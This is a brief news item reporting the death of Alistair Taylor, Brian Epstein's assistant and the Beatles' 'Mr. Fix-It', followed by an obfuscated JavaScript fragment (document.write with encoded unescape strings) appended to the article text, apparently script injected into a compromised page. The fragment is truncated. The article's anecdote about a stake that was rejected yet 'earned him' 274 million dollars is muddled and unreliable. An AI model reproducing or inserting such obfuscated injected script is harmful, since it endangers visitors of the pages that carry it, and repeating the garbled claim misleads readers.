The man The Beatles called "Mr. Fix-It" has died. Alistair Taylor died in his sleep on June ninth after a short bronchial illness, according to British reports.
He was 69. Taylor worked as manager Brian Epstein's personal assistant and was general manger of Apple.
He accompanied Epstein the first time Epstein saw The Beatles at the Cavern Club in 1961, and he stayed with the band until they broke up. Taylor once rejected an offer to sell his two-and-a-half percent stake in the band, which ended up earning him about 274 million dollars.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
